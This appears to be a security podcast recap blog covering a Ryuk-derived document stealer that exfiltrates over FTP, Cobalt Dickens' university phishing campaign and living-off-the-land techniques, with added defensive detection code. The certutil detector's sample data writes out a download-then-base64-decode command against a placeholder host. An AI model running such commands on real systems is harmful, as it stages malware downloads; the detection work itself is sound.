Breaking Badness

26. This Is Why We Can't Have Nice Things


Here are a few highlights from each article we discussed:

This Threat Actor Has a Good Left Ryuk

  • This piece of malware behaves like a lot of the ransomware we see: a process kicks off and crawls the user’s home directory looking for specific file extensions. Normal ransomware would then run its encryption routine over each of those files and drop a ransom note on the user’s desktop.
  • This is the point where this malware differentiates itself: it filters for document files like Excel and Word. Once it finds those documents, it does another unusual thing: it string-matches for specific sensitive keywords, words like “financial, military, secret, tank, contract”. If a match occurs, the files are transferred over FTP to an attacker-controlled FTP server IP address.
  • It’s interesting to see malware still leveraging really old protocols like FTP, especially when the attacker is trying to capture sensitive data but transmitting it over a plaintext channel that gives it no protection.
  • I think this malware really reeks of code reuse from Ryuk and an unsophisticated threat actor. The malware specifically looks for Ryuk ransomware artifacts to see if it’s been infected previously, things like the “.RYK” file extension and the ransomware note dropped with Ryuk in the name.
  • I think the motive is really obvious that these threat actors are trying to gather sensitive documents, but what their purpose is I’m not sure right now. I really want to take a thread and investigate the FTP infrastructure more.
  • I firmly believe a majority of attackers are lazy, and copy-pasting / re-using code snippets can get the job done. I don’t think this is a case of the Ryuk authors changing their motives or direction at all.
  • Attackers were targeting the top baby names of 2018 in the US. I’m not sure if this would add signal or add more noise for data exfiltration operations.
  • This malware doesn’t leverage a particular exploit, so we can assume that all the common delivery vectors apply here: trojanized applications on the Internet, malicious emails, etc.
  • To an organization, this is not that concerning *if you have the proper fundamental controls in place*.
  • If you aren’t looking for FTP egress and/or don’t have decent AV, then your risk of a bad PR incident when your sensitive data is leaked is much higher.
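The “looking for FTP egress” control above, as an added example that is not part of the podcast or its articles: a small detector over constructed firewall flow records that flags internal hosts opening FTP control sessions to external servers outside an assumed allowlist of sanctioned FTP destinations.

```python
import ipaddress
from collections import defaultdict

# Constructed sample firewall flow records (not from the podcast):
# timestamp src_ip src_port dst_ip dst_port proto action
SAMPLE_FLOWS = """\
2019-08-27T09:01:02Z 10.20.4.15 51522 203.0.113.77 21 tcp allow
2019-08-27T09:01:03Z 10.20.4.15 51523 203.0.113.77 21 tcp allow
2019-08-27T09:02:10Z 10.20.4.15 51600 203.0.113.77 49152 tcp allow
2019-08-27T09:05:44Z 10.20.7.9 44410 198.51.100.10 21 tcp allow
2019-08-27T09:06:01Z 10.20.9.3 40001 192.0.2.200 443 tcp allow
2019-08-27T09:07:15Z 10.20.9.3 40002 10.20.1.5 21 tcp allow
"""

# RFC 1918 ranges; adjust to the organisation's own address plan.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]

# Assumed: the only external FTP server the organisation legitimately uses (constructed address).
SANCTIONED_FTP = {"198.51.100.10"}


def is_internal(ip: str) -> bool:
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in INTERNAL_NETS)


def parse_flow(line: str) -> dict:
    ts, src, sport, dst, dport, proto, action = line.split()
    return {"ts": ts, "src": src, "dst": dst, "dport": int(dport), "proto": proto, "action": action}


def ftp_egress_alerts(log_text: str, sanctioned=SANCTIONED_FTP) -> dict:
    """Map each internal host to the unsanctioned external FTP servers it opened control sessions to.

    Only the control channel (TCP/21) is matched: passive-mode data transfers use
    ephemeral high ports, so they cannot be identified from port numbers alone.
    """
    hits = defaultdict(set)
    for line in log_text.splitlines():
        if not line.strip():
            continue
        flow = parse_flow(line)
        if flow["proto"] != "tcp" or flow["dport"] != 21 or flow["action"] != "allow":
            continue
        if not is_internal(flow["src"]) or is_internal(flow["dst"]):
            continue  # only internal -> external counts as egress
        if flow["dst"] in sanctioned:
            continue
        hits[flow["src"]].add(flow["dst"])
    return {src: sorted(dsts) for src, dsts in hits.items()}
```

A host that shows up here with no business reason is worth a look before the PR incident, not after.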

Not So Great Expectations

  • Cobalt Dickens is associated with the Mabna Institute, a private contractor based in the Islamic Republic of Iran that works for the Iranian government. In March 2018, the FBI indicted 9 individuals from this organization for intrusion, wire fraud, and aggravated identity theft at the behest of the Iranian government.
  • Their targets have included 144 universities in the United States, 176 foreign universities in 21 countries, five federal and state government agencies in the United States, 36 private companies in the United States, 11 foreign private companies, and two international non-governmental organizations.
  • You’d think they’d stop there. However, in August 2018 Secureworks released a report stating that they had evidence the group had not stopped; in fact, it had continued, targeting 76 universities in 14 countries using tactics similar to before in an effort to steal credentials.
  • Their recent campaign included domains acquired from Freenom, a domain provider that administers some free TLDs: .ml, .ga, .cf, .gq, and .tk.
  • Here is some research carried out regarding Freenom and other free domain providers.
  • The sites this group registered also had valid SSL certificates, which made them seem much more authentic. They were issued by Let’s Encrypt, which issues a lot of free SSL certificates. Free domains and free SSL certificates are a good thing for legitimate sites that need them, but this campaign is a good example of how they can be abused for nefarious purposes.
  • The group really stuck to their core mission on this one and targeted universities, as we’ve seen them do multiple times before. This time, they targeted 60 universities in Australia, the United States, the United Kingdom, Canada, Hong Kong, and Switzerland. All in all (including previous campaigns), this group has been identified targeting at least 380 universities in over 30 countries. Many universities have been targeted multiple times.
  • It seems this group frequently targets these universities’ library systems, which leads researchers to believe they may be trying to get their hands on intellectual property or other research conducted by these universities.
  • Since they are conducting their operations at the behest of the Iranian government, they are likely targeting information that would be of use to the government, such as research that may feed into weapons or defenses, transportation, or international relations publications.
  • I don’t have any evidence of what types of research specifically they were targeting with each attack, but those types would be my educated guess.
  • The group used compromised university systems to send library-themed phishing emails containing links to spoofed login pages for resources associated with the targeted universities. This phishing campaign was actually pretty similar to previous 2018 campaigns, except that those used shortened links to obscure the attackers’ infrastructure, whereas these messages contained the spoofed URLs directly.
  • Once users click the malicious link, they are led to a page designed to resemble the legitimate library website that asks for their credentials. The credentials they enter are saved to a text file for the actor to collect later, and the user is redirected to the legitimate library page.
  • The March 2018 indictment had no impact on this group or their operations. They have not even changed tactics, let alone stopped their campaigns. On a positive note, many universities are implementing MFA to help mitigate the threat from this group. Even if the group gets a username and password, MFA will help prevent them from logging in and stealing IP or other information.
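The two traits of these spoofed library links that the article calls out, a free Freenom TLD and the institution’s own name under a foreign TLD, as an added triage check that is not part of the podcast or the Secureworks report. The legitimate hostnames are constructed placeholders for an assumed institution; the https scheme is deliberately not treated as a trust signal, since the spoofed pages carried valid Let’s Encrypt certificates.

```python
from urllib.parse import urlsplit

# The free Freenom TLDs named in the article.
FREE_TLDS = {"ml", "ga", "cf", "gq", "tk"}

# Assumed: the institution's genuine library hosts (constructed names).
LEGIT_HOSTS = {"library.exampleuniv.edu", "catalog.exampleuniv.edu"}


def registrable(host: str):
    """Naive split into (second-level label, TLD); adequate for the TLDs above."""
    labels = host.lower().rstrip(".").split(".")
    if len(labels) < 2:
        return host.lower(), ""
    return labels[-2], labels[-1]


def assess_url(url: str):
    """Classify a link: ('ok', []) for a known host, ('suspicious', reasons) or ('unknown', [])."""
    host = (urlsplit(url).hostname or "").lower()
    if host in LEGIT_HOSTS:
        return "ok", []
    sld, tld = registrable(host)
    reasons = []
    if tld in FREE_TLDS:
        reasons.append(f"registered under free TLD .{tld}")
    # Lookalike: our institution's label appears anywhere in the host, but the
    # registrable domain is not ours (e.g. exampleuniv.ml or exampleuniv.edu.<foreign>.ga).
    institution = {registrable(h) for h in LEGIT_HOSTS}
    squashed = host.replace("-", "")
    for label, legit_tld in institution:
        if label in squashed and (sld, tld) != (label, legit_tld):
            reasons.append(f"contains institution label '{label}' outside .{legit_tld}")
    return ("suspicious", reasons) if reasons else ("unknown", [])
```

Earlier campaigns hid the destination behind shortened links, which this check cannot see through until the link is expanded.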

Living off the LAN

  • A malware trend that caught my eye is Living Off the Land techniques – these continue to be my favorite trends in the malware space. The challenge to those of us who do malware investigations and research is that we have benign, allowlisted and digitally signed processes doing malicious things. The challenge here from a blue team perspective is enormous.
  • One of my favorites is leveraging the Microsoft ‘certutil’ binary as a legitimate stager to download and execute base64-encoded malware implants from an actual URL. All natively baked into Windows.
  • The article references Turla attacks, which we covered in a previous episode (episode 18), so for full commentary, check that out. For the SparkNotes version – Turla (a well-known Russian APT group) apparently took over infrastructure previously used by OilRig (a well-known Iranian APT group) and used it in their campaign.
  • The article notes that the group used a mix of custom and publicly available hacking tools and legitimate admin software, moving towards Tarik’s favorite technique of living off the land. In this instance we saw Turla using PowerShellRunner, a publicly available tool used to execute PowerShell scripts without using powershell.exe (among other tools such as Meterpreter).
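The certutil stager above is a signed Windows binary doing something a blue team needs to notice, so as an added example (not from the podcast or the article) here is detection logic over constructed process-creation events: it flags certutil.exe runs whose command line fetches a remote file or base64-decodes one. The event format is assumed, a pipe-delimited line per process start.

```python
import re
from pathlib import PureWindowsPath

# Constructed sample process-creation events (not from the podcast), one per line:
# time|host|parent_image|image|command_line
SAMPLE_EVENTS = r"""
2019-08-27T10:00:01Z|WS-0412|C:\Windows\System32\svchost.exe|C:\Windows\System32\certutil.exe|certutil -verify cert.cer
2019-08-27T10:02:13Z|WS-0412|C:\Windows\System32\cmd.exe|C:\Windows\System32\certutil.exe|certutil.exe -urlcache -split -f http://example.invalid/p.txt C:\Users\Public\p.txt
2019-08-27T10:02:20Z|WS-0412|C:\Windows\System32\cmd.exe|C:\Windows\System32\certutil.exe|certutil.exe -decode C:\Users\Public\p.txt C:\Users\Public\p.exe
2019-08-27T10:05:00Z|WS-0199|C:\Windows\explorer.exe|C:\Windows\System32\notepad.exe|notepad.exe
"""

# (regex over the lower-cased command line, reason) pairs; certutil accepts both - and / switches.
SUSPICIOUS = [
    (r"[-/]urlcache", "certutil fetching a remote file (download cradle)"),
    (r"[-/]decode", "certutil base64-decoding a file (payload staging)"),
    (r"https?://", "URL passed to certutil"),
]


def parse_event(line: str) -> dict:
    ts, host, parent, image, cmdline = line.split("|", 4)
    return {"ts": ts, "host": host, "parent": parent, "image": image, "cmdline": cmdline}


def certutil_alerts(log_text: str) -> list:
    """Return one alert per certutil.exe execution whose command line matches a suspicious pattern."""
    alerts = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ev = parse_event(line)
        # Match on the image name, not the command line, so a renamed copy of the
        # binary is still caught by whatever logs the image path (e.g. Sysmon).
        if PureWindowsPath(ev["image"]).name.lower() != "certutil.exe":
            continue
        cmd = ev["cmdline"].lower()
        reasons = [why for pattern, why in SUSPICIOUS if re.search(pattern, cmd)]
        if reasons:
            alerts.append({"ts": ev["ts"], "host": ev["host"],
                           "parent": PureWindowsPath(ev["parent"]).name, "reasons": reasons})
    return alerts
```

Ordinary certificate work (the -verify line) passes through untouched; the download-then-decode pair on WS-0412, spawned from cmd.exe, is the sequence worth paging someone for.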

This Week’s Hoodie/Goodie Scale

This Threat Actor Has a Good Left Ryuk

[Tarik]: 2/10 Hoodies
[Emily]: 2/10 Hoodies

Not So Great Expectations

[Tarik]: 4/10 Hoodies
[Emily]: 6/10 Hoodies

Living off the LAN

[Tarik]: 8/10 Hoodies
[Emily]: 7.5/10 Hoodies


That’s about all we have for this week. You can find us on Twitter @domaintools, and all of the articles mentioned in our podcast will always be included in our podcast recap. Catch us Wednesdays at 9 AM Pacific time when we publish our next podcast and blog.

*A special thanks to John Roderick for our incredible podcast music!